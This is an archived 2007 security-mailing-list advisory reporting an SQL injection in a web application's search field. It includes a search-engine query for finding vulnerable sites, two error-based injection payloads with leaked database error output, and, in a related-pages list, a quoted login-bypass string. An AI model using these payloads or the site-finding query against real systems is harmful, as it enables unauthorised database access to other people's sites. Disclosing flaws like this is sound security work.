DocuSafe "Search" SQL Injection

From: No-Reply@xxxxxxxxxxxxxxxxx
Date: 13 Nov 2007 23:28:13 -0000

DocuSafe "Search" SQL Injection

Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System

insert your command in the section "search"
example:
'having 1=1--
Result:
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)

Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

or
'group by tblMain.fldArtNr having 1=1--
result:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)

Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.

/includes/common.asp, line 62

Regards,
The-0utl4w
Credits Goes To Aria-Security.Net

Prev by Date: Free Forums "search" Sql Injection
Next by Date: Konqueror Remote Denial Of Service
Previous by thread: Free Forums "search" Sql Injection
Next by thread: Konqueror Remote Denial Of Service
Index(es):
- Date
- Thread

Relevant Pages

Aria-Security.Net Research: Rapid Classified HotList Image
... Shout Outs: AurA, imm02tal ... Vendor: http://www.freshink.net/rc-links.htm ... Google Search: Developed by: GA Soft ... Username: anything' OR 'x'='x ...
(Bugtraq)
Adding disk firmware programming capability to camcontrol
... it into a camcontrol command. ... +"fwdownload program firmware of the named device with the given image" ... * of each vendor listed has been programmed successfully using this code. ... +Program firmware of the named device using the image file provided. ...
(freebsd-current)
Adding disk firmware programming capability to camcontrol
... it into a camcontrol command. ... +"fwdownload program firmware of the named device with the given image" ... * of each vendor listed has been programmed successfully using this code. ... +Program firmware of the named device using the image file provided. ...
(freebsd-current)
Re: event viewer error..
... Using MSCONFIG is one way to check for MS/non-MS services but it's possible ... for a rogue file to masquerade as an MS service. ... Check the command line for the service. ... A Google search using that service's name as the search term brings up ...
(microsoft.public.windowsxp.general)
Re: Setting samplerate on /dev/dsp
... > are 8bit mono sound, i want to know how to set the samplerate and ... > mono/stereo from the command line, a google search showed me only how to ... > samplerate before capture? ...
(Debian-User)